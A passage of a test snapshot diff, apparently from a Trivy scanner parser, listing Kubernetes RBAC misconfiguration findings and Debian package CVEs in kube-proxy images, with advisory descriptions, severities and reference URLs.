'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/2081494", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV045", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv045", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on specific resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Create a role which does not permit wildcard verb on specific resources", - "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv045", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/2087913", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/2104905", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-37600", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-37600", - "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", - "https://github.com/karelzak/util-linux/issues/1395", - "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", - "https://security.netapp.com/advisory/ntap-20210902-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-37600", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-37600", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-37600", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://github.com/karelzak/util-linux/issues/1395", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.33.1-0.1", - "packageName": "bsdutils", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.30-3", - "packageName": "coreutils", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "timing attack in RSA Decryption implementation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.30-3", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.19.8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.19.7", - "packageName": "dpkg", - "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", - ], - }, - "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", - ], - }, - "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": 